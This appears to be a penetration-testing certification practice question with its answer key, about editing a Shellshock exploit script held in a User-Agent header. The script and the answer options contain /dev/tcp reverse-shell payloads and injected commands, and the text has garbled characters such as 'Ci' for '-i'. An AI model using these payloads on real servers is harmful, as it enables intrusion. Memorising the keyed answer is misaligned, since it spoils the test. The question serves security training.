Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

autonumA penetration tester discovers a vulnerable web server at 10.10.1.1.

The tester then edits a Python script that sends a web exploit and comes across the following code:

exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/127.0.0.1/9090 0>&1”,

“Accept”: “text/html,application/xhtml+xml,application/xml”}

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?
A . exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci id;whoami”, “Accept”:
“text/html,application/xhtml+xml,application/xml”}
B . exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& find / -perm -4000”, “Accept”:
“text/html,application/xhtml+xml,application/xml”}
C . exploits = {“User-Agent”: “() { ignored;};/bin/sh Ci ps Cef” 0>&1”, “Accept”:
“text/html,application/xhtml+xml,application/xml”}
D . exploits = {“User-Agent”: “() { ignored;};/bin/bash Ci>& /dev/tcp/10.10.1.1/80” 0>&1”,
“Accept”: “text/html,application/xhtml+xml,application/xml”}

View Answer

Answer: A